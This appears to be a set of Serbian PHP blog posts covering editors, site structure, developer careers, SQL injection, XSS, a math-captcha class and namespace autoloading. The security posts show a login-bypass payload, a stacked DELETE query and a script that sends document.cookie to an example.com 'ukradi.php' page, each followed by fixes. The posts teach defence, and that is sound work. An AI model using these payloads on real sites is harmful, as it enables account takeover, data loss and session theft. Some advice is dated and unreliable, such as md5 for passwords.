Pitanje 1: Prvo što me je zanimalo u čemu se radi, tj. šta ti koristiš za kucanje koda? Nama je za ispit profa tražio Notepad++, ali sam sada instlirao Dreamweaver, koji mi nije baš legao, pa sada kucam u NetBeans-u, on mi je dobar.

U startu si napravio dobar izbor. Kada sam počinjao pre 5-6 godina tu nije bilo mnogo izbora. Dreamweaver 2004 je bio de facto najbolji editor za html i css. Meni je on u početku odgovarao jer sam mogao da splitujem view i da vidim i kod i rezultat kodiranja, onosno kako će izgledati. Nisam ni morao da pišem CSS, već da kroz razne menije stilizujem sajt. Ali, onda sam na Internetu nalazio preporuke da je taj način loš i da ništa neću naučiti, pa sam se trudio da shvatim kako funkcioniše box model, šta su block, a šta inline elementi, učio one sve fore iz CSS-a i krenuo samostalno da pišem kod. Bilo je tu mnogo muke, nisam imao nikog da mi objasni šta je šta i kako funkcioniše, već sam sam istraživao i isprobavao razne tehnike. Kad ukapiraš stvari, shvatiš koliko je to zapravo jednostavno

Kasnije, sa Dw sam prešao na Zend Studio, zato što je imao mnogo bolju podršku za PHP od Dw koji je ranije imao samo syntax hightlighing, bez autocomplete opcije.

Sada koristim nekoliko editora, za razvoj Netbeans ili PhpStorm, neki projekti su mi u jednom, neki u drugom, nisam se još odlučio koji da mi bude default za razvoj.  Notepad++ mi je default editor u Windowsu, služi mi uglavnom za brzo pregledanje fajlova, možda neke brze izmene (ne bih da čekam 5min da mi se Netbeans digne).

Za bilo kakav ozbiljan razvoj jako je bitno da to bude IDE, a ne običan editor. Debugger, inteligentan autocomplete i mnoge druge pomoćne opcije se više nego korisne.

Pitanje 2: Od čega početi? Prikupiti materijal, napraviti strukutru pa onda index. Ali, koje smernice pratiti? Koliko nivoa u dubinu, koliko i kakvih menija praviti?

Nema nekog univerzalnog pravila i uglavnom zavisi od vrste i veličine projekta. Na primer, nekada je dobro  krenuti od dizajna, nekada od definisanja strukture i elemenata, nekada od projektovanja baze podataka, a nekada i od pisanja frejmvorka.

Verovatno se pitanje odnosi na strukturu svih stranica, odnosno sitemap iliti hijerarhiju stranica. Jedno je samo važno – web razvoj nema konačno stanje, pa ti zato preporučujem da krećeš od jednostavnijih struktura, do prvog nivoa. Kasnije, uvek možeš dorađivati i širiti hijerarhiju, što opet zavisi od tipa projekta, ali uvek vodi računa da to bude što jednostavnije za razumevanje.

Pitanje 3: Horizontalni meni – neko ga uradi kao UL listu, a negde sam video i kao skup „left float“ divova. Šta je bolje?

Bolje je da to bude lista linkova (UL LI) i to samo zbog semantike, jer je nekako logično da ti linkovi budu grupisani u neku listu, dok DIV (divizija ili sekcija) element bi trebalo da koristiš za grupisanje i pozicioniranje elemenata na strani (npr header, footer, sidebar, article). U oba slučaja, CSS kod će biti maltene isti.

Pitanje 4: Posle završene index stranice, da li prekopirati kod (tj header, footer, menu divove) pa menjati centralni sadržaj tako dobiti nove html stranice ili se to radi na neki drugi način

Ne, nikako. To će ti postati najgora noćna mora kada budeš trebao nešto da promeniš, moraćeš to isto da uradiš na mnogo drugih mesta. Razmisli o tome da uporedo sa HTML i CSS-om učiš i PHP.  Ukratko, vrlo je jednostavno da podeliš HTML na delove i da ih „ubacuješ“ na stranicu po potrebi, pa tako možeš imati više HTML fajlova sa PHP ekstenzijom – header.php, index.php, footer.php i onda ćeš samo u index.php dodati <?php include „header.php“; ?> To je najjednostavan primer, vremenom ćeš videti kako neki paterni (MVC) i neke biblioteke (Smarty) ti mogu dosta olakšati razvoj.

Srećno, javi kada napraviš i postaviš svoj prvi sajt

Za početak, neke stvari moraju biti jasne. Developer i programer nisu iste osobe. Ni po znanju, ni po iskustvu, ni po poslovima koje obavljaju. Developer razvija, dizajnira, implementira, pronalazi nova i savremena rešenja, razmišlja, standardizuje… Programer ima dosta manje obaveza i uglavnom samo jednu – da programira. Da tuđe ideje pretvori u kôd. Međutim, i developer mora biti programer, ali ga je i odavno prevazišao.
Ali pre nego što je postao web developer, morao je početi od prvog koraka – učenje. Ako želiš da budeš web developer, moraš naučiti neki od popularnih “server side” programskih jezika. Da li će to biti PHP, ASP.NET ili Ruby, na tebi je. Gledaj samo da pri odluci uzmeš u obzir trenutno stanje tržišta. Pogledaj i oglase za zapošljavanje. Trenutno, PHP je jedan od najpopularnijih jezika, a kvalitetnih programera ima veoma malo. Oni kvalitetniji već imaju posla preko glave.

Dakle, odabrao si PHP, lepo Sada ti je potrebno samo vreme i resursi. Vreme je relativno i zavisi od čoveka do čoveka. Meni je trebalo oko 8 meseci, uz studiranje, bez prethodnog iskustva u programiranju, da bih mogao da kažem da sam PHP programer. Ti ćeš verovatno moći dosta brže, sve zavisi od tvoje volje i želje za znanjem. Ne zaboravi samo da uporedo moraš da učiš i HTML i CSS i mislim da ti je jasno i zašto. To znanje možeš steći na razne načine, a evo i nekih preporuka:

• Kupiti knjigu je dobar izbor. Cene su od 20 do 50 € i kupovina knjige o programskom jeziku za tebe treba da predstavlja investiciju koja će ti se uskoro veoma isplatiti. Ovde i nije toliko bitan naslov, ni autor, bitno je da pokriva barem PHP verziju 5.0.
• Raspitati se o kursevima, seminarima i predavanjima. Ukoliko studiraš, raspitaj se u studentskim organizacijama koje se bave IT-em. (Na FON-u je takav kurs besplatan za članove FONIS-a). Možeš i da pretražiš web i da nađeš škole računara koje održavaju ovakve kurseve. Ili pak, pitaj mene da za privatni čas
• Online kursevi – definitivno najjeftiniji način sticanja znanja. Ukoliko imaš brzi pristup Internetu, pogledaj ove video kurseve. I to nije sve, surfuj, naćićeš gomilu resursa!
• Budi u toku – učlani se i priključi se na online forume i diskusije. Pitaj, čitaj, uči od drugih i deli svoje iskustvo sa drugima. Preporuka – StackOverflow. Takođe, poveži se sa ljudima iz svoje braše.

Imaj u vidu da samo čitanje knjige, posećivanje predavanja i seminara ti neće mnogo pomoći. Rešenje i sam znaš – vežba. Za početak, napravi jednostavnu aplikaciju koja ti procesira formular. Zatim napravi jednostavnu knjigu gostiju. A zatim reši konkretan problem – pronađi nekoga kome treba web sajt i ponudi da mu to uradiš besplatno. Preporučujem ti da to bude neka neprofitna organizacija, jer ćeš u većini slučajeva dobiti pozitivan odgovor, čak i ako nemaš iskustva.

U tom trenutku kriva tvog iskustva i znanja će naglo početi da raste. Iskoristi to. Budi kreativan, trudi se da budeš i dizajner. Uči Photoshop. Uči JavaScript i jQuery. Razmišljaj – trudi se da na pravi način rešiš tvom klijentu problem.

Postani iskusan PHP programer

Sledeći period tvog života se zove sticanje iskustva, znanja i profita. Postoji samo nekoliko pravaca kojima možeš krenuti:

Freelancing - ili po srpski – rad na crno Mogućnosti za privlačenje novih klijenata su neograničene. Možeš voditi blog, imati svoj sajt sa portofoliom, možeš se predstavljati kao “agencija za web dizajn i programiranje“… pogledaj već sledeći link – http://freelanceswitch.com/blog/explore/.

Radni odnos u Internet kompaniji ili kompaniji koja se bavi razvojem web aplikacija. Za mnoge ovaj vid sticanja iskustva je pogodniji i jedan od glavnih pogodnosti je sigurnost. Međutim, do takvog posla je i teže doći, zbog nedostatka iskustva. Prirodni tok je da radiš na crno, a posle nekog vremena, odnosno posle nekoliko završenih projekata da se prebaciš na legalno.

Imaj u vidu da možeš raditi i oba posla istovremeno. Samo pažljivo, ukoliko budeš bio prepoterećen u jednom pravcu, drugi pravac će trpeti na produktivnosti. Radi to veoma pažljivo i dobro biraj klijente.

Moram ti napomenuti još da mnogi web developeri mogu biti self-employed, ili pak mogu otvoriti svoju legalnu agenciju za pružanje development usluga ili Internet kompaniju. Ako se odlučiš za to, ti prestaješ da budeš web developer i postaješ preduzetnik.

Dok XSS predstavlja indirektan napad na korisnike, SQL Injection predstavlja direktan napad na PHP aplikaciju, odnosno na bazu podataka. Cilj ovog napada je da se izmeni određeni SQL upit kako bi se izršile razne akcije, od dobijanja aletrantivnih podataka, do izmene ili brisanja podataka iz baze podataka.
Napad SQL Injection-om se uglavnom vrši na skripte za proveru autentifikacije korisnika, odnosno prilikom provere korisničkog imena i lozinke, kako bi se SQL upit izmenio i uvek izvršio tako da uvek “dohvata” podatke o nekom korisniku. Sledeći primer demonstrira propust prilikom provere korisničkih podataka:

<?php
// podaci sa login forme
$username = $_POST['username'];
$password = $_POST['password'];

// provera podataka
$sql = "SELECT * FROM korisnici WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql);
if(mysql_num_rows($result) > 0) {
	// korisnik je ulogovan...
}
?>

Ukoliko bi napadač u ovakav login formular umesto korisničkog imena i lozinke uneo sledeću vrednost:

a' OR '1' = '1

SQL upit koji bi se izvršio izgledao bi ovako:

SELECT * FROM korisnici WHERE username = 'a' OR '1'='1' AND password = 'a' OR '1'='1'

Ovakav upit bi sigurno vratio podatke o nekom korisniku, i u ovom konkretnom primeru omogućio bi korisniku da bude ulogovan. Dodavanjem još nekih uslova, na primer WHERE id = ’1′ ili nekog drugog ID-a, postoji velika verovatnoća da će biti autorizovan kao administrator sistema.
Osim kod provere autentifikacije, može se iskoristiti i u druge zlonamerne svrhe, a jedan od njih je ubacivanje dodatnog upita koji može uništiti podatke ili neke druge zlonamerne akcije.
Sledeći primer demonstrira SQL injection u cilju izvršenja dodatnog upita:

// ubacivanje dodatnog upita
$name = "Pera'; DELETE FROM korisnici”;
mysql_query("SELECT * FROM korisnici WHERE name='$name'");

Izvšenje više upita odjednom nije podržano u mysql_query() funkciji, ali drugi drajveri, npr za PostgreSQL ili SQLite, to dozvoljavaju, pa tako izvšenje ovakvog koda predstavlja ozbiljan sigurnosni propust.

Zaštita

Kao što je već spominjano u ranijim glavama, filtriranje inputa može sprečiti većinu sigurnosnih problema i obavezna je stavka sigurne aplikacije. Ukoliko bi filtrirali podatke tako da korisniku zabranimo unos specijalnih karaktera specifičnih za SQL upite, na primer apostrofe, i za lozinke možemo da koristimo jednosmerne enkripcije, na primer md5, sigurno bi povećali sigurnost. Međutim,postoje i druge metode za sprečavanje napada, a da dozvolimo sve karaktere:
• Escape inputa – mysql_real_escape_string()
• Pripremljeni izrazi

mysql_real_escape_string()

Ova funkcija pripada mysql drajveru, ali je poseduje i mysqli drajver (mysqli_real_escape_string) i osigurava da će svi specijalni karakteri biti pravilno eskejpovani, odnosno da se pri građenju upita i dalje ponašaju kao sastavni deo tog stringa i nikako ne iskoriste u izmeni upita. Ova funkcija je “best practice” i mora se izvršiti nad svim promenjivima koji grade upit.

$username = mysql_real_escape_string($_POST['username']);

Upit za gore navedeni primer nakon eskejpovanja-a promenjivih izgleda ovako:

SELECT * FROM korisnici WHERE username = 'a\' OR \'1\'=\'1' AND password = 'a\' OR \'1\'=\'1'

i zaštićen je od SQL injection napada. Pošto ove funkcije za eskejpovanje pripadaju drajveru za rad sa bazom podataka, sve kose crte “\” neće biti unete sa ostalim podacima u bazu, što nije slučaj u korišćenju addslashes funkcije.
Napomena: Pretpostavka je da je isključen magic_quotes_gpc, u suprotom se podaci moraju normalizovati, pa tek onda eskejpovati. Normalizacija podataka je objašnjena ranije.

Pripremljeni izrazi (Prepared statements)

Pripremljeni izrazi nisu tolika velika novost, ali mnogi programeri početnici izbegavaju da ih koriste, a verovatno je to zbog slabog razumevanja načina na koji rade. Pre svega, treba napomenuti da pripremljeni izrazi ne mogu da se koriste u starim verzijama drajvera, kao što je standaradni mysql. Takoreći, mysql drajver je starijeg datuma i njegov dalji razvoj je odavno obustavljen. Čak je i preporuka PHP konzorcijuma da se on potpuno izbaci iz korišćenja i da se koriste drajveri kao što su MySQLi i PDO. Ova dva drajvera su dosta brži i poseduju dosta sigurnosnih karakteristika.
Priprema izraza, odnosno njegovo građenje se odvija na MySQL serveru, pa stoga ne postoji mogućnost same izmene upita u php aplikaciji, a zbog načina na koji radi, ni na serveru. Prilikom pisanja upita, umesto promenjivih vrednosti koriste se operater “?”, a promenjive se šalju posebnom funkcijom, onim redosledom kakvim se ubacuju u upit.
Sledeći kôd opisuje rad MySQLi drajvera i pripremljenih izraza:

<?php
$username = $_POST['username'];
$password = $_POST['password'];

// Konekcija sa MySQL bazom
$mysqli = new mysqli('localhost', 'user', 'password', 'world');

$stmt = $mysqli->prepare("SELECT * FROM korisnici WHERE username = ? AND password = ? LIMIT 1");
// Vrednosti promenjivih se šalju na u upit
$stmt->bind_param('ss', $username, $password);

// izvršavanje upita
$stmt->execute();

if($stmt->affected_rows > 0) {
	// korisnik je ulogovan
}

//...

// zatvaranje izraza i upita
$stmt->close();
?>

Više o MySQLi drajveru i njegovim funkcionalnostima možete saznati na adresi:
http://php.net/manual/en/book.mysqli.php

XSS je tip sigurnosnih propusta koji je karakterističan za web aplikacije koji omogućava napadaču da ubaci kôd koji se izvršava na klijentskoj strani (JavaScript, ActiveX, HTML) u našu web stranicu. Cilj ovakvog napada je dobijanje osetljivih podataka kao što su korisničke sesije (cookie), odvođenje na drugu stranicu ili bilo koji drugi cilj koji se može postići izvršenjem koda na korisničkoj strani.

XSS-u su najčešće podložne web aplikacije koje ispisuju korisnički sadržaj – na primer: forumi, knjige gostiju, komentari članova i druge.

Sledeći primer opisuje XSS napad na stranicu koja ispisuje komentare članova. Ukoliko bi imali formu za upis komentara sličnu ovoj:

<form action="komentar.php" method="POST" />
    Vaše ime: <input type="text" name="ime" /><br />
    Komentar: <textarea name="komentar" rows="10" cols="60"></textarea><br />
    <input type="submit" value="Upišite komentar" />
</form>

i PHP skriptu koja ispisuje komentar

<?php
echo "<p>$ime je napisao:<br />";
echo $komentar ."</p>";
?>

definitivno bi imali ozbiljan sigurnosni propust. Korisnik može upisati komentar, ali i dodati HTML i JavaScript koji neće biti vidljiv od strane drugih korisnika. Komentar sa kojim napadač može ukrasti podatke o sesiji, koji se čuvaju u cookiu je sledeći:

<script>
	document.location = 'http://www.example.com/ukradi.php?kolacic=' +
      document.cookie
</script>

Ako bi bilo koji korisnik posetio ovu stranu, koja sadrži komentar sa ovim kôdom, biće preusmeren na drugu adresu. Ne samo da će svi naši korisnici otići na neki drugi sajt, već će napadač moći da pristupi našim kolačićima preko GET metode.
U zavisnosti od naših potreba, postoji više rešenja i više različitih PHP funkcija koje nam mogu pomoći.

HTML entiteti

Jedno od rešenja za XSS je da specijalne HTML karaktere (<, >, ‘, “, &) konvertujemo u njihove tekstualne entitete (&lt;, &gt;, &apos;, &quot;, &amp; ) i tako možemo biti sigurni da će HTML kôd biti ispisan onako kako je unet, pa tako i JavaScript neće biti izvšen.
PHP poseduje dve funkcije koje konvertuju HTML tagove u entitete. Jedna od njih je htmlspecialchars koja konvertuje gore navedene HTML tagove u odgovarajuće entitete:

<?php
$komentar = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $komentar; // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
?>

Odnosno, zaštita za našu skriptu za ispis komentara bi bila:

<?php
// konvertovanje outputa
$ime = htmlspecialchars($ime);
$komentar = htmlspecialchars($komentar);

echo "<p>$ime je napisao:<br />";
echo $komentar ."</p>";
?>

Druga funkcija je htmlentities koja konvertuje sve specijalne karaktere u svoje entitete, kao što su ©, », € i druge.

Izbacivanje HTML tagova

Drugi način sprečavanja XSS-a je izbacivanje HTML tagova iz komentara. Za ovo je potrebna vrlo jednostavna funkcija – strip_tags koja jednostavno briše sve HTML i PHP tagove i ostavlja čist tekst.

<?php
$komentar = '<p>Tekst u paragrafu.</p><!-- Komentar --> <a href="# ">Link</a>';
echo strip_tags($komentar);
?>

]

U ovom slučaju, svi html tagovi će biti izbačeni i biće ispisan samo sledeći tekst:

Tekst u paragrafu. Link

strip_tags ima još jednu mogućnost, a to je da izostavi tagove koje ne želimo da izbacimo. Na primer, ukoliko želimo da omogućimo korisnicima da koriste jednostvno formatiranje teksta, kao na primer: bold, em i sl, možemo koristiti:

strip_tags($komentar, '<strong><em><u>');

Međutim, moramo uzeti u obzir da se JavaScript može izvršiti unutar bilo kojeg taga, korišćenjem atributa onLoad ili onClick i sličnih, pa stoga ovakvo filtriranje može predstavljati sigurnosni rizik.

P.S. Sledeći tekst o sigurnosti PHP aplikacija biće o SQL injection-u. Stay tuned

Ovakav sistem zaštite ste sigurno sretali širom Interneta i zasniva se na izračunavanju sume dva i više sabiraka. Npr. Izračunajte 2 plus 5.

<?php
class SpamProtection {
    private $numbers = array();
    private $salt = '!5p4mpr073c7%#';

    public function getRandNumber($min = 1, $max = 5) {
        return $this->numbers[] = mt_rand($min, $max);
    }

    public function getHash() {
        return $this->makeHash($this->sum());
    }

    public function check($result, $hash) {
        return !($this->makeHash($result) == $hash);
    }

    private function sum() {
        return array_sum($this->numbers);
    }

    private function makeHash($result) {
        return md5($this->salt . $result);
    }
}
?>

Ideja je da korisnik upiše rezultat dva i više sabiraka i da se taj rezultat pošalje preko formulara, zajedno sa jednosmerno enkriptovanim pravim rezultatom. Na strani procesiranja formulara, rezultat koji je upisao korisnik se ponovo enkriptuje i upoređuje sa hash-om sa formulara. Hash je saltovan, zbog veće sigurnosti.

Evo i koda, na strani formulara.

// form.php
include "path/to/SpamProtection.php"
$spam = new SpamProtection();

echo 'Koliko je '. $spam->getRandNumber() .' + '. $spam->getRandNumber() .'<br />';
echo '<input type="text" name="spam_result" />';
echo '<input type="hidden" value="'. $spam->getHash() .'" name="spam_hash" />';

I na strani procesiranja formulara

// submit.php
include "path/to/SpamProtection.php"
$spam = new SpamProtection();

if($spam->check($_POST['spam_result'], $_POST['spam_hash'])) {
 die("Spam protection!");
}

Kao što vidite iz primera, vrlo je jednostavna i lako se koristi, a što je najvažnije, vrlo je efikasna. Međutim, nije ni savršena, postoji dosta nedostataka, ali imati bilo kakvu zaštitu formulara je svakako bolje nego nemati je uopšte.

P.S. Ukoliko iskoristite ovu klasu u nekom svom projektu, ostavite komentar, biće mi drago

Potrebno je da vaša aplikacija poštuje samo jednu stvar – putanja do klase mora biti ista kao namespace kojoj ta klasa pripada. Ko poznaje Javu i razume sistem paketa, sve će mu biti jasno.

Ukoliko imate klasu User, sa putanjom:

/controllers/users/User.php

ta klasa bi trebala bi ima sledeći namespace:

namespace controllers\users;

i u uprošćenoj verziji izgledala bi ovako:

<?php
namespace controllers\users;

class Users
{
    private $user;
    function __construct() { ... }
    function showUserPage() { ...}
    function showUsersSettings() { ...}
}
?>

Ukoliko bi želeli ovu instanciramo ovu klasu, sa automatskim učitavanjem, recimo u index.php skriptu, takav skript bi izgledao ovako:

<?php
define("ROOT", realpath(__DIR__));
set_include_path(get_include_path().PATH_SEPARATOR.ROOT);
spl_autoload_extensions('.php');
spl_autoload_register();

$user = new \controllers\users\User();

?>

Vrlo zgodno zar ne? Nastaviću sa ovim primerom i pokazati kako namespace može biti još korisniji. Recimo i da je ovoj našoj klasi User potreban model korisnika, odnosno klasa /models/users/User.php, u standardnom sistemu, bez korišćenja namespacova bi morali da je preimenujemo u nešto drugo, npr ModelUser.php, da ne bi došlo do koalizije. Ali u ovom našem, možemo vrlo jednostavno instancirati model korisnika, npr u konkstruktoru:

function __construct() {
    $this->user = \model\users\User();
}

Još zgodnija stvar bi bila kada bi koristili aliase za namespaceove, pa tako možemo na početku User klase definisati da on koristi klasu models\users\User kao UserModel. Ovo je naročito bitno kada je se klasa nalazi na dubljem nivou:

use \models\users\User as UserModel;
....
$this->user = UserModel();

That’s all folks!